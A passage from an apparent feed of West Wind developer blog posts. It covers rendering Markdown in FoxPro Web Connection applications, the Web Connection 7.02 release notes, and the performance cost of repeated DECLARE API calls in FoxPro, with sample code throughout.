If the content you create is controlled, then this not a problem. In this case I'm the only consumer. If you use Markdown for product descriptions in your product catalog, and the data is all internally created then it's probably safe to allow scripts. But even so - if you don't have scripts, don't allow them. Better safe than sorry - always!

Static Markdown in Web Connection

In addition to the simple Markdown Parsing, if you're using Web Connection there are a couple of useful features built into the framework that let you work with Markdown content.

  • Static Markdown Islands in Scripts and Templates
  • Static Markdown Pages

If you're building Web sites you probably you probably have a bit of static content. Even if your site is mostly dynamic, almost every site has a number of static pages, or a bunch content that is just text like disclaimers or maybe some page level help content. Markdown is usually much easier to type than HTML markup for this lengthy text.

Markdown Islands

Web Connection Scripts and Templates support a special <markdown> tag. Basically you can embed a small block of Markdown into the middle of a larger Script or Template:

<markdown>> ##### Please format your code> If your post contains any code snippets, you can use the `<\>` button> to select your code and apply a code language syntax. It makes it > **much easier** for everyone to read your code.</markdown>

This can be useful if you have an extended block of text inside of a greater page. For example you may have a download page that shows a rich HTML layout for download options, but the bottom half of the page, has disclaimers, licensing and other stuff that's mostly just text (perhaps with very little HTML mixed in which you can do inside of Markdown). Here's that example:

Static Markdown Pages

Sometimes you simply want to add a static page that is all or mostly text. Think about your About page, privacy policy, licensing pages etc. There are other more dynamic use cases as well. For example, you might want to create blog entries as Markdown Pages and simply store them on the server by dropping the page into a folder along with its related assets.

As of Web Connection 6.22 you can now drop a .md file into a folder and Web Connection will serve that file as an HTML document.

There's a new .md script map that Web Connection adds by default. For existing projects you can add the .md scriptmap to your existing scriptmaps for your site and then update the wwScripting class from your Web Connection installation.

There's also a new ~/Views/MarkdownTemplate.wcs, which is a script page into which the Markdown is rendered. Web Connection then generically maps any incoming .md extension files to this template and renders the Markdown into it.

The template can be extremely simple:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%><% Layout="~/views/_layoutpage.wcs" %><div class="container"><%= pcMarkdown %></div>

This page simply references the master Layout page and then creates a bootstrap container into which the markdown is rendered. There are two variables that are passed into the template pcMarkdown and pcTitle. The title is extracted from the document either by looking for a Yaml title header:

---
title: Markdown in FoxPro
postId: 432
---
# Markdown in FoxPro
Markdown is... and blah blah blah 

or for the first # Header element towards the top of the document (first 1500 chars).

Once the scriptmap and template are in place you can now simply place a .md document into the site's folder structure and it'll be served as HTML when referenced via the browser.

For the following example, I took an existing blog post I'd written in Markdown Monster as a Markdown file. I set up a folder structure for blog posts that include parts for paths and simply dropped the existing Markdown file and its associated images inot that folder:

And voila - I can now access this file at the specified URL:

https://localhost/wconnect/Markdown/posts/2018/09/25/FixwwDotnetBridgeBlocking.md

The folder structure provides the URL sections that fixes the post uniquely in time which is common for Blog posts. This is an easy way to add a blog to a Web site without much effort at all. Simply write Markdown as a file and copy it to the server. For bonus points integrate this with Git to allow posts to be edited and published using Git.

Using Markdown in Applications

Let's look at a few examples how I use Markdown in my own applications.

West Wind Support Message Board

In a Web Application it's easy to use Markdown and just take the output and stuff it into part of your rendered HTML page.

For example, on my message board I let users enter Markdown for messages that are then posted and displayed on the site:

The message board is available as a Web Connection sample site on GitHub:

The site displays each thread as a set of messages, with each message displaying it's own individual Markdown content. This is a Web Connection application that uses a templates.

The Process class code just retrieves all the messages into a cursor from a business object and then uses Script Page to render the output:

FUNCTION Thread(lcThreadId)
LOCAL loMsgBus

pcMsgId = Request.QueryString("msgId")

loMsgBus = CREATEOBJECT("wwt_Message")
lnResult = loMsgBus.GetThreadMessages(lcThreadId)

IF lnResult < 1
   Response.Redirect("~/threads.wwt")
   RETURN
ENDIF

PRIVATE poMarkdown
poMarkdown = THIS.GetMarkdownParser()

Response.GzipCompression = .T.

*** Don't auto-encode - we manually encode everything
*** so that emojii's and other extendeds work in the
*** markdown text
Response.Encoding = ""
Response.ContentType = "text/html; charset=utf-8"

Response.ExpandScript("~/thread.wwt")

This retrieves a list of messages that belong to the thread and the template loops through them and displays Markdown for each of the messages (simplified):

<%
    pcPageTitle = STRCONV(subject,9) + " - West Wind Message Board"
    pcThreadId = Threadid
%><% Layout="~/views/_layoutpage.wcs" %><div class="main-content">
    ...  page header omitted<div class="thread-title page-header-text" style="margin-bottom: 0;"><%: TRIM(Subject) %></div><!-- Message Loop --><%
    lnI = 0
    SCAN
       lnI = lnI + 1
    %><div id="ThreadMessageList">              <article class="message-list-item" data-id="<%= msgId %>" data-sort="<%= lnI %>">
            ... header omitted<!-- Render the Message Markdown here --><div class="message-list-body"><%=  poMarkdown.Parse(Message,.T.) ) %></div></article></div><% ENDSCAN %></div> 

Note that I'm not using the Markdown function directly, as I'm doing some custom setup and I also want to explicitly force the output to UTF-8 as part of the parsing process (the .T. parameter). The reason I'm using a custom function is that I need to explicitly strip out <% %> scripts before rendering so that they don't get executed as part of user input. I also want all links to automatically be opened in a new window called wwt by having a target added to each and every link tag.

In short I need a customized parser and the generic Markdown() function doesn't quite provide what I need, so I implement my own version that is customize to my needs.

PROTECTED FUNCTION GetMarkdownParser()
LOCAL loMarkdown

PUBLIC __wwThreadsMarkdownParser
IF VARTYPE(__wwThreadsMarkdownParser) = "O"
   loMarkdown = __wwThreadsMarkdownParser
ELSE
	loMarkdown =  CreateObject("MarkdownParserExtended")
	loMarkdown.lFixCodeBlocks = .T.
	loMarkdown.cLinkTarget = "wwt"
	__wwThreadsMarkdownParser = loMarkdown
ENDIF

RETURN loMarkdown
ENDFUNC

This is very similar to what Markdown() does internally, but customized to my own needs. It still caches the parser instance in a global variable so it doesn't have to be recreated for each and every serving which improves performance.

Entering Markdown

The message board also captures Markdown text when users write a new message:

The data entry here is a simple <textarea></textarea>. As mentioned Markdown is just text, so a <textarea> works just fine.

<textarea id="Message" name="Message"
        style="min-height: 350px;padding: 5px; 
        font-family: Consolas, Menlo, monospace; border: none;
        background: #333; width: 100% ; color: #fafafa"><%= Request.FormOrValue('Message',poMsg.Message) %></textarea>

I simply changed the color scheme to use black on white just to make it more 'terminal like' (I happen to like dark themes if you haven't noticed ??). There is also logic to insert special Markdown into the textbox via selections using JavaScript and key shortcuts, but that's just a bonus.

The text is previewed as you type on the client side using a JavaScript component (marked Js) that simply redisplays as the user types a message. Oddly enough - people still seem to screw up posting code constantly, even though the buttons are pretty prominent as the is the message below. Go figure.

Using Markdown for Inventory Item information

A common use case for Markdown is to use it even in desktop applications that need to handle rich information. For example, in my Web Store I use Markdown for the item descriptions that are displayed in the store. I also have an offline application that I primarily use to manage my orders and inventory. The inventory form allows me to enter markdown text as plain text. There's a simple preview button that lets me simply see the content in the default browser.

If it's all good I can upload the item to my Web Server via a Web service and look at the item online where the Markdown is rendered using Markdig as shown before (but using .NET in this case).

The desktop application doesn't use Markdown in other places so here I just do the simplest thing possible in .NET code:

private void btnPreview_Click(object sender, EventArgs e)
{
    var builder = new MarkdownPipelineBuilder()
        .UseEmphasisExtras()
        .UsePipeTables()
        .UseGridTables()
        .UseAutoLinks() // URLs are parsed into anchors
        .UseAutoIdentifiers(AutoIdentifierOptions.GitHub) // Headers get id="name" 
        .UseAbbreviations()
        .UseYamlFrontMatter()
        .UseEmojiAndSmiley(true)
        .UseMediaLinks()
        .UseListExtras()
        .UseFigures()
        .UseCustomContainers()
        .UseGenericAttributes();

    var pipeline = builder.Build();
    
    var parsedHtml = Markdown.ToHtml(Item.Entity.Ldescript,pipeline);

    var html = PreviewTemplate.Replace("${ParsedHtml}", parsedHtml);
    ShellUtils.ShowHtml(html);
}

ShellUtils.ShowHtml(html); is part of Westwind.Utilites and simply takes an HTML fragment or a full HTML document and dumps it to a file, then shows that file in the default browser which is the browser window shown in the previous figure.

Using HTML for Documentation

As mentioned Markdown is great for text entry and documentation creation is the ultimate writing excercise. There are a couple of approaches that can be taken with this. I've two separate tools related to documentation:

  • West Wind Html Help Builder
    An older FoxPro application that stores documentation content in FoxPro tables. The application was updated a while back to use Markdown for all memo style text entry.

  • KavaDocs
    This is a newer tool still under development that uses Markdown files on disk with embedded meta data to hold documentation and related data. The system is based on Git to provide shared editing functionality and collaboration. There are also many integrations with other technologies.

Help Builder and Traditional Help Systems

Help Builder uses FoxPro tables and is a self-contained solution where everything lives in a single tool. Help Builder was designed originally for building CHM files for use - with FoxPro and other tools, and the UI reflects that. In recent years however the focus has been on building Web based output along with a richer Web UI than was previously used.

Help Builder internally uses script templates that are used to handle the layout for each topic type. The following is the main Topic template into a which the content of the oTopic object and its properties that make up the help content is rendered:

<% Layout="~/templates/_Layout.wcs" %><h1 class="content-title"><img src="bmp/<%= TRIM(LOWER(oHelp.oTopic.Type))%>.png"><%= iif(oHelp.oTopic.Static,[<img src="bmp/static.png" />],[]) %><%= EncodeHtml(TRIM(oHelp.oTopic.Topic)) %></h1><div class="content-body" id="body"><%= oHelp.FormatHTML(oHelp.oTopic.Body) %></div><% IF !EMPTY(oHelp.oTopic.Remarks) %><h3 class="outdent" id="remarks">Remarks</h3><blockquote>        <%= oHelp.FormatHTML(oHelp.oTopic.Remarks) %></blockquote><% ENDIF %>  <% IF !EMPTY(oHelp.oTopic.Example) %><h3 class="outdent" id="example">Example</h3><%= oHelp.FormatExample(oHelp.oTopic.Example)%><% ENDIF %>   <% if !EMPTY(oHelp.oTopic.SeeAlso) %><h3 class="outdent" id="seealso">See also</h3><%= lcSeeAlsoTopics %><%  endif %>

These templates are customizable by the user.

The key items to not here is the oHelp.FormatHtml() function which is responsible for turning the content of a specific multi-line field into HTML. There are several formats with Markdown being the newest addition.

***********************************************************************
* wwHelp :: FormatHtml
*********************************
LPARAMETER lcHTML, llUnformat, llDontParseTopicLinks, lnViewMode
LOCAL x, lnRawHTML, lcBlock, llRichEditor, lcText, lcLink, lnRawHtml

IF EMPTY(lnViewMode)
  IF VARTYPE(this.oTopic) == "O"
     lnViewMode = this.oTopic.ViewMode
  ELSE
     lnViewMode = 0
  ENDIF     
ENDIF

*** MarkDown Mode
IF lnViewMode = 2 
   IF TYPE("poMarkdownParser") # "O"
      poMarkdownParser = CREATEOBJECT("wwHelpMarkDownParser")
      poMarkdownParser.CreateParser(.t.,.t.)
   ENDIF
   RETURN poMarkdownParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF  

IF lnViewMode = 1
   RETURN lcHtml
ENDIF

IF lnViewMode = 0 OR lnViewMode = 1
	loParser = CREATEOBJECT("HelpBuilderBodyParser")	
	RETURN loParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF

RETURN "Invalid ViewMode"
* EOF FixNoFormat

As I showed earlier in the Message Board sample, here again I use the Markdig parser, but in this case there's some additional logic built ontop of the base Markdown parser that deals with Help Builder specific directives and formatting options. wwHelpMarkdownParser extends MarkdownParserExtended to do this.

As before the parser is cached so if the instance exists it doesn't have to be created again for performance. Each topic can have up to 5 Markdown sections so reuse is an important performance point. The template renders HTML output into a local file, which is then displayed in the preview on the left in a Web Browser control.

Output generation varies depending on whether you're previewing which generates a local file that is previewed from disk. Online there's a full HTML UI that surrounds each topic and provides for topic navigation:

The online version is completely static, so the Markdown to HTML generation actually happens during build time of the project. Once generated you end up with a static HTML Web site that can just be uploaded to a Web server.

KavaDocs

KavaDocs is another documentation project I'm working on with Markus Egger. It also uses Markdown but the concept is very different and relies on Markdown files on disk and online in a Git repository. There are two components to this tool. One is a local Markdown Monster Addin that basically provides project features to tie together the Markdown files that otherwise just exist on disk. The KavaDocs Addin provides a table of contents and hierarchy and some base information about topics. Most of the topic related information is actually stored inside of the topic files as YAML data.

Files are stored and edited as plain Markdown files with topic content stored inside each of the topics. The Table of Contents contains the topics list to tie the individual topics together along with a few bits of other information like keywords, categories, related links and so on.

The other part to KavaDocs is an online application. It's a SAAS application that can serve this Markdown based documentation content dynamically via a generic Web service interface. You create a Web site like markdownmonster.kavadocs.com which then serves the documentation directly from a Github repository using a number of different nicely formatted and real-time switchable themes.

The concept here is very different in that the content is entirely managed on disk via plain Markdown files. The table of content pulls the project information together, and Git serves as the distribution mechanism. The Web site provides the front end while Git provides the data store.

The big benefit for this solution is that it's easy to collaborate. Since all documentation is done as Markdown text it's easy to sync changes on Git and any changes merged into the master branch are immediately visible as soon as a change is made. It's a really quick way to get documentation online.

White Papers and Articles like this one

These days I much prefer to write everything I can in Markdown. However, for articles for print or even some online magazines, the standard for documents continues to be Microsoft Word mainly because the review process in Word is well defined.

However, I like to write my original document with Markdown because I simply have a more efficient workflow writing this way, with real easy ways to capture images and paste them into documents for example. Markdown Monster's image pasting feature also copies files to disk and optimizes them, and it's just huge time saver as is the built in image capture integration using either SnagIt or a built-in capture. Linking to Web content too is much quicker with Markdown as is dealing with often frequently changing code snippets for technical articles. Belive me when I say that using Markdown can shave hours of document creation for me compared to using Word.

So for publications I often write in Markdown and then export the document to Word either using HTML rendering and importing the HTML, or by using PanDoc which is the Swiss Army knife of document conversions to convert my Markdown directly to Word or PDF. PDF conversions can be very good as you can see the Markdown Monster generated PDF output of the original document for this article here. Conversions to MS Word are usually good, but they do need adjustments for the often funky paragraph formatting required for publishers. Even with that step writing in Markdown plus document fixing is usually easier than writing in Word.

The other advantage of this approach is that once the document is in Markdown I can reuse the document much more easily. If you've ever written a Word document and then tried to publish that Word document on the Web, you know what a hot mess Microsoft Word HTML is. It works but the documents are huge and basically become uneditable as HTML.

With a document written in Markdown I can convert my doc to Word to push and do a quick edit/cleanup run before pushing to my publisher, but I can then turn around and use the same Markdown and publish it on my blog, submit the PDF to conference and also make it available on GitHub for editing. I can also use the page handler I described earlier to simply drop the Markdown file plus the images into a folder on my Web site.

IOW, Markdown makes it much easier to reuse the content you create because it is just text and inherently more portable.

Generic Markdown Usage

Once you get the Markdown bug you'll find a lot of places where you can use Markdown. I love using Markdown for Notes, ToDo lists, keeping track client info, call logs, quick time tracking and other stuff.

here are a few examples.

Using Gists to publish Markdown Pages

Github has a related site that allows you to publish individual code snippets for sharing. Github Gist is basically a mini Git repository that holds one or more files that you can quickly post and share. It's great for sharing a code snippet on Twitter or other social network that you can then link to from a Tweet for example.

Gists are typically named as files and the file extension determines what kind of syntax coloring is applied to the snippet or snippet(s). One of the supported formats is Markdown which makes it possible to easily create Gists and write and publish an entire article.

publishing of Gists, which are essentially mini documents that can be posted as Code snippets on the Web. It's an easy way to share code snippets or even treat it like a simple micro blogging platform:

Gists can be shared via URL, and can also be retrieved via a simple REST API.

For example, Markdown Monster allows you to open a document from Gist using Open From Gist. You can edit the document in the local editor, then post it back to the Gist which effectively updates it. All this happens through two very simple JSON REST API calls.

One fly in the oinment to this approach is that images have to be linked as absolute Web URLs because there's no facility to upload images as part of a Gist. You can upload images to a Github image repo, Azure Blob storage or some similar mechanism to create your images as absolute URLs.

I love posting Gists for Code Samples. Although gists support posting specific language files (like foxpro or csharp files) I much rather post a Markdown document that includes the code and then describe more info around the code snippet.

Markdown for Everything? No!

Ok, so I've been touting Markdown as pretty awesome and I really think it addresses many of the issues I've had over the years of writing for publications, writing documentation or simply keeping track of things. Using Markdown has made me more productive for many text editing tasks.

But at the same time there are limits to what you can effectively do with Markdown at least to date. For magazine articles I still tend to need to use Word. Although I usually write my articles using Markdown, I usually have to convert them to a Word document (which BTW is easy via HTML conversion or even using a tool like PanDoc to convert Markdown to Word). The reason is that my editors work with Word and when all is said and done Word's Document Writer Review and Comparision are second to none. While you can certainly do change tracking and multi-user syncing by using Markdown with Git, it's not anywhere as smooth as what's built into Word.

There are other things that Markdown is not good for. When talking about HTML, Markdown addresses bulk text editing needs nicely. If you're editing an About page or Privacy Policy, Sales page etc. Markdown is much easier than HTML to get into the page. Even larger blocks of Html Text inside of larger HTML documents are a good fit for Markdown using what I call Markdown Islands. But Markdown is not a replacement for full HTML layout. You're not going to replace entire Web sites using just Markdown - you still need raw HTML for layout and overall site behavior.

In short, make sure you understand what you're using Markdown for and whether that makes sense. I think it's fairly easy to spot the edges where Markdown usage is not the best choice and also where it is. If you're dealing with mostly text data Markdown is probably a good fit. Know what works...

Markdown for Notes and Todo Lists

In addition to application related features, I've also found Markdown to be an excellent format for note taking and general notes. It's easy to create lists with Markdown text, so it's easy to open up a Markdown document and just fire away.

Here are some things I keep in Markdown:

General Notes

  • General Todo List
  • Phone Call Notes Document

Client Specific Notes

  • Client specific Notes
  • Client specific Work Item List
  • Client Logins/Account information (using MM Encrypted Files)

Shared Content - DropBox/OneDrive

  • Clipboard.md - machine sharable clipboard

Shared Access: DropBox or Git

First off I store most of my notes and todo items in shared folders of some sort. For my personal notes and Todo lists they are stored on DropBox in a custom Notes folder which has task specific sub-folders.

For customers I tend to store my public notes in Git repositories along with the source code (in a Documentation or Administration folder usually). Private notes I keep in my DropBox Notes folder.

Markdown Monster Favorites

Another super helpful feature in Markdown Monster that I use a lot is the Favorites feature. Favorites lets me pin individual Markdown documents like my Call Log and ToDo list or an entire folder on the searchable Favorites tab. This makes it very quick to find relevant content without keeping a ton of Markdown documents open all the time.

Summary

Markdown is simple tech which at the surface seems like a throwback to earlier days of technology. But - to me at least - the simpler technology actually means better productivity and much better control over the document format. The simplicity of text means I get a fast editor, easy content focused editing and as an extra bonus as a developer I get the opportunity to hack on Markdown with code. It's just text so it's easy to handle custom syntax or otherwise manipulate the Markdown document.

In fact, I went overboard on this and created my own Markdown Editor because frankly the tooling that has been out there for Windows really sucked. Markdown Monster is my vision of how I want a Markdown Editor to work. I write a lot and so a lot of first hand writing experience and convenience is baked into this editor and the Markdown processing that happens. If I was dealing with a proprietary format like Word, or even with just HTML, none of that would be possible. But because Markdown is just text there are lots of opportunities to manipulate both the Markdown itself in terms of (optional) UI editing experience as well the output generation. It's truly awesome what is possible.

this post was created and published withMarkdown Monster

Resources

Web Connection 7.02 has been released

$
0
0

I'm happy to announce that I've released v7.02 of West Wind Web Connection today. This is primarily a maintenance release that fixes a few small issues that have cropped since the initial 7.0 release, but there are also quite a few new enhancements and small new features.

You can find Shareware version of Web Connection here:

If you are a registered user, you should have gotten an email late last week with a download link. I've made a few more small fixes to the release since then, so if you downloaded last week or over the weekend you might want to re-download the latest bits using the same info from the update email.

Updating to Version 7.02

This release is not a major update and there is only one small breaking change due to a file consolidation. This is first and foremost a maintenance update for the huge 7.0 release, but if you're running 7.0 you should definitely update for the bug fixes.

Updates are easy and can simply install on top of an existing version, or you can install multiple versions side by side and simply adjust your specific project's path to the appropriate version folders.

Bug Fixes

First and foremost this release is a maintenance release that fixes a few small but annoying bugs in a number of different aspects of Web Connection. Version 7.0 was a huge drop of new functionality and processes in Web Connection and there were a few small issues that needed fixing as is usually the case when there is a major release.

A huge shoutout to Mike McDonald who found and reported quite a few small bugs and posted them on the message board. Mike went above and beyond apparently poking around the Web Connection code base to dig up a few obscure (and a few more serious ones) which have now been fixed. Thanks Mike!

Setup Improvements

The primary focus of Version 7.x has been to make the development and deployment process of Web Connection easier and the 7.02 continues this focus with a number of Setup and Getting Started related enhancements.

Web Connection now generates a launch.prg file for new projects and ships with a launch.prg for the sample project. This file is a one stop start mechanism for your application, launching both the Web Connection server during development and the Web Browser. This PRG file also contains the default environment setup (Paths back to the Web Connection installation basically) to make it drop dead easy to run your applications. The file can start either a full local IIS Web Server or launch IIS Express.

To launch with IIS or Apache:

do launch

to launch IIS Express:

do launch with .t.

The main reason for this file is to make it easier for first time users to make it easier to check out their application. It's also a great way to start your application for the first time after a cold FoxPro start and to ensure that the FoxPro environment is set up properly. The file can be customized too - for example you can add additional path and environment settings that you need for your setup, and you can change the startup path to a page that you are actively developing for quickly jumping into areas you are working on.

There are also improvements in the BrowserSync functionality to automatically refresh Web pages when you make changes to the Web content files. This was introduced in v7.0 and the default template has been improved for more reliable operation.

The Setup now also explicitly prompts for IIS or IIS Express setup when installing to remind people explicitly that a Web Server has to be installed before Web Connection is installed.

I've also spent quite a bit of time updating the Getting Started documentation to reflect some of these changes so the Setup docs, and the Getting Started tutorial all are updated for easier usage.

Updated Sample Applications

The West Wind Message Board and WebLog applications are fully functional sample applications that are in use on the West Wind site. Both have been updated to MVC Style scripting application from their original WebControl bases. The Message Board was updated for v7.0 and there have been a number of additional enhancements including a few nice editor updates, much better image compression on uploaded images and search enhancements. The WebLog has been completely reworked and simplified to MVC style scripts for the application.

The Message Board is available as an installable sample application on Github while the WebLog sample ships in the box with Web Connection as before.

New wwDynamic Class

There's also new useful feature in the form of a wwDynamic Class which lets you dynamically create a FoxPro class, simply by adding properties to it. This is similiar to using the FoxPro EMPTY class with ADDPROPERTY(), except you don't actually have to use that cumbersome syntax. The class also supports an AddProperty() method that can automatically set up the special character casing required for JSON Serialization. The .AddProperty() of the class automatically creates a _PropertyOverrides property that is utilized during JSON serialization to handle proper casing instead of the lower case default used otherwise.

Here's an example of using the wwDynamic class to create a type 'on the fly':

*** Extend an existing object
loCust = CREATEOBJECT("cCustomer")
loItem = CREATEOBJECT("wwDynamic",loCust)

*** Alternately you create a new object (EMPTY class) 
* loItem = CREATEOBJECT("wwDynamic")

loItem.Bogus = "This is bogus"
loItem.Entered = DATETIME()

? loItem.Bogus
? loItem.Entered

loItem.oChild.Bogus = "Child Bogus"
loItem.oChild.Entered = DATETIME()

? loItem.oChild.Bogus
? loItem.oChild.Entered

*** Access original cCustomer props
? loItem.cFirstName
? loItem.cLastName
? loItem.GetFullName()

For properly typed names with casing left intact for JSON Serialization .AddProperty() can be used:

loMessage = CREATEOBJECT("wwDynamic")
loMessage.AddProp("Sid", "")
loMessage.AddProp("DateCreated", DATETIME())
loMessage.AddProp("DateUpdated", DATETIME())
loMessage.AddProp("DateSent",DATETIME())
loMessage.AddProp("AccountSid","")
loMessage.AddProp("ApiVersion","")

* "Sid,DateCreated,DateUpdated,DateSent,AccountSid,ApiVersion"
? loMessage.__PropertyNameOverrides 

? loMessage.DateCreated
? loMessage.DateUpdated

loSer = CREATEOBJECT("wwJsonSerializer")
loSer.
loSer.Serialize(loMessage) && produces properly cased property names

Note I got the idea of this from Marco Plaza on the Universal Thread who came up with this idea and provides a library with a slightly different implementation that is a little more verbose, but provides a more pure data implementation. wwDynamic takes a more pragmatic approach that focuses on the ease of use in code, but there are a couple of edge cases due to FoxPro's weird handling of a few reserved property names.

A few wwHttp Enhancements

There are also a couple of enhancements in wwHttp. The first is some additional control over file uploads by adding some additional parameters to .AddPostKey() when posting multi-part form variables and specifically files.

.AddPostKey() now supports additional tcContentType and tcExtraHeaders parameters that allow you to specify a content type and additional Mime headers to the content. Extra headers are added as self-contained lines. Files now also add a content-length header to the attached file.

loHttp = CREATEOBJECT("wwHttp")
loHttp.nHttpPostMode = 2  && multi-part
loHttp.AddPostKey("txtNotes","Image of a wave")

*** Add content type and 
loHttp.AddPostKey("File",".\wave.jpg",.T.,"image/jpeg","x-file-id: 451a423df")

lcResult = loHttp.Post(lcUrl)

The wwHttp class now also adds new explicit methods for .Get(), .Post(),.Put() and .Delete(). These are simply wrappers around the existing .HttpGet() that set the `cHttpVerb

New wwUtils Path Functions that support Proper Case Paths

Added several new methods the wwUtils library that deal with returning filenames with proper paths. FoxPro's native path functions have the nasty habit of mangling paths to upper case, and in several applications this has caused me a number of issues with paths getting embedded with non-matching case. This can be problematic for Web Content that might end up on a case sensitive Linux server.

There's are now GetFullPath(), GetRelativePath(), OpenFileDialog() and SaveFileDialog() functions that all return paths in the proper case from files located or created on disk.

The OpenFileDialog() and SaveFileDialog() functions provide Windows File Open and File Save dialogs using the .NET file dialogs. All of the new methods use .NET code to provide the properly cased paths.

Interesting that it is so hard to translate paths into properly cased paths in Windows. I noodled around with various Windows API calls but it turns out they all have a few odd quirks that make them not work reliably especially for figuring out a relative path.

In the end the easiest solution was to call into .NET and rely on a combination of Path and URL helper system calls to provide the functionality here. Even the .NET code is not as straight forward as it could be. For me this was a requirement for a documentation application I've been working on for a customer where generated HTML output image links had to exactly match the and pathnames on disk. This also fixes a similar issue for me in Html Help Builder where traditionally paths were embedded as all lower case.

All Web Connection Binaries are now Signed

All Web Connection Binaries that are shipped - the setup and console exes, all dlls and the setup self-extracting package - are now properly signed with a digital certificate to verify the authenticity of the binaries as coming from West Wind Technologies. The signed exes should help with reducing nasty warning messages from Windows and SmartScreen and provide a nicer, less scary elevation prompt that also displays the West Wind source of the code instead of an anonymous binary name.

Summary

As you can see there's quite a bit of new stuff in this small point release. Behind the scenes Web Connection now also has a more reliable build process to compile each release, which has traditionally been very time consuming to me because of all the varied pieces pulled in. This release is the first that uses a fully automated end to end build process that completes in about 20 seconds. It won't make it quicker to fix errors and add new features, but it will make it much easier to release updates if we should find a breaking issue. Plan on seeing more frequent releases with smaller amount of changes in the future.

Check it out and as always please post any issues that you might run into on the Message Board.

See you there...

this post created and published with Markdown Monster

API Declarations in Performance Sensitive FoxPro Code

$
0
0

Visual FoxPro has good support for interfacing with API interfaces by using the DECLARE API keyword that lets you essentially map a function in Win32 DLL and map it a FoxPro callable function.

The good news is that you can a) do this and b) that it's very efficient. FoxPro's interface mechanism to the DLL call once it's registered is very quick.

Call your DLLs right

When you make API calls in FoxPro it's basically a two step process:

  • Declare your API and map it to a FoxPro function
  • Call the mapped function

Personally I tend to almost always abstract API calls into separate FoxPro functions that abstract away the API-ness of the function:

FUNCTION WinApi_SendMessage(lnHwnd,lnMsg,lnWParam,lnLParam)

DECLARE integer SendMessage IN WIN32API ;
        integer hWnd,integer Msg,;
        integer wParam,;
        Integer lParam

RETURN SendMessage(lnHwnd,lnMsg,lnWParam,lnLParam)
ENDFUNC 

to make it easier to call this code from FoxPro directly. It works fine this way but if you are calling APIs that are frequently called in quick succession you may find that performance is not all that great.

A Real World Example

Recently Christof Wollenhaupt posted a Windows API based implementation of various Hash encryption routines called FoxCryptoNg that don't require any external libraries using all native Windows APIs. You can check out the code here.

If you look at the code you see there's a DeclareApiFunction section that declares a number of APIs and originally his code would call the DeclareApiFunctions() method for each hash operation.

I checked out the code and ran some tests for performance (not really sure why) comparing it with the routines that I use in the wwEncryption class in the West Wind Client Tools and Web Connection.

When running the tests initially - when the declare APIs were called for each method call - the performance was abysmal. So much so that I filed an issue on Github.

The issue basically compares the function vs. the wwEncryption class. Running a test of a 1000 SHA56 hash encodings was taking over 15 seconds with foxCryptong class vs. under a second with the .NET based routines in wwEncryption.

Christof eventually responded and tracked down the performance to the API declarations. By changing is code to declare the declaration in the Init() instead of in each method performance ended up then being actually a little faster than the .NET based approach.

Watch your Declarations

So the code to get a went from:

Procedure Hash_SHA256 (tcData)
	Local lcHash
	DeclareApiFunctions()
	lcHash = This.HashData ("SHA256", m.tcData)
Return m.lcHash

taking over 15 seconds for 1000 hashes

to:

Procedure Init()
	DeclareApiFunctions()
EndProc

Procedure Hash_SHA256 (tcData)
	Local lcHash
	lcHash = This.HashData ("SHA256", m.tcData)
Return m.lcHash

to 0.7 seconds.

Whoa hold on there hoss - that's more than 20 times faster!!!

The moral of the story is that API calls are fast, but declarations are not!

The reason for this is that FoxPro's API functionality has to look up these API functions in the Windows libraries. It has to look up the function in these rather large libraries, verify the function signature and then provide a mapping to the FoxPro function that can be called from FoxPro code. That setup takes time and that's exactly what we're seeing here in terms of performance.

Bottom Line: For high traffic API calls - separate your API declaration from your API call!

Christof's solution was to simply move the declaration to the Init() which is fair. But as he points out in his response there's the possibility that somebody calls CLEAR DLLS at some point which would lose the declarations and the API calls would then fail. I actually find that quite unlikely but hey - anything is possible. If you can fuck it up, somebody probably will. ??

Isolating API Call From Declaration

I had never really given this a lot of thought to performance of API calls, although implicitly I've always felt like API calls didn't run particularly fast. I never really tested but now I think that the perceived slowness may have simply been the declaration overhead. For most of my applications I use API declarations go with the call so I'm as culpable as Christof's code to performance issues.

For example here's one that actually gets called quite frequently in my code - calling one of my own DLLs - and probably could use DECLARE optimization.

************************************************************************
*  JsonString
****************************************
FUNCTION JsonString(lcValue)
DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output
LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC
*   JsonString

Find High Traffic Methods and Separate

So there are a number of ways you can address the separation to cause declarations to be called just once.

Use a Class and DeclareApis style Initialization

Christof's solution of using a DeclareApis() function where you have all your declares in one place up front is a great solution if you are using a class. Why a class? Because it has a clear entry point that you can isolate and call with. A class is also a reference that you can easily hold onto after an individual call, and then reuse that class later to make additional calls.

Just to re-iterate to do this you'd create:

DEFINE Class ApiCaller as Custom

Procedure Init()
	DeclareApiFunctions()
EndProc

Procedure DoSomething(tcData)
	return ApiMethod(tcData)
EndProc

Procedure DeclareApiFunctions()
    DECLARE Integer ApiMethod In mydll.dll string
    DECLARE ...
EndProc

Static Declarations

The above approach works reasonably well but it may still end up calling the declarations many times because you may be instantiating the class multiple times.

Another approach I've found useful on high traffic APIs is to wrap them around a PUBLIC gate variable that checks if the API was previously declared.

So imagine I have this function (as I do in wwUtils.prg in various West Wind Tools):

FUNCTION JsonString(lcValue)

DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output
	__JsonEncodeStringAPI = .T.

LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
lnPointer = JsonEncodeString(lcValue,@lcOutput)
RETURN WinApi_NullString(@lcOutput)
ENDFUNC

Running the following test code:

DO wwutils
lnSeconds = SECONDS()
FOR lnX = 1 TO 100000
	lcJson = JsonString("Hello World")
	lcJson = JsonString("Goodbye World")
ENDFOR

lnSecs = SECONDS() - lnSeconds
? lnSecs

takes 15.2 seconds to run.

Now let's change this code with a Public gate variable definition that only declares it once:

FUNCTION JsonString(lcValue)

PUBLIC __JsonEncodeStringAPI
IF !__JsonEncodeStringAPI
	DECLARE INTEGER JsonEncodeString IN wwipstuff.dll string  json,string@  output
	__JsonEncodeStringAPI = .T.
ENDIF	

LOCAL lcOutput 
lcOutput = REPLICATE(CHR(0),LEN(lcValue) * 6 + 3)
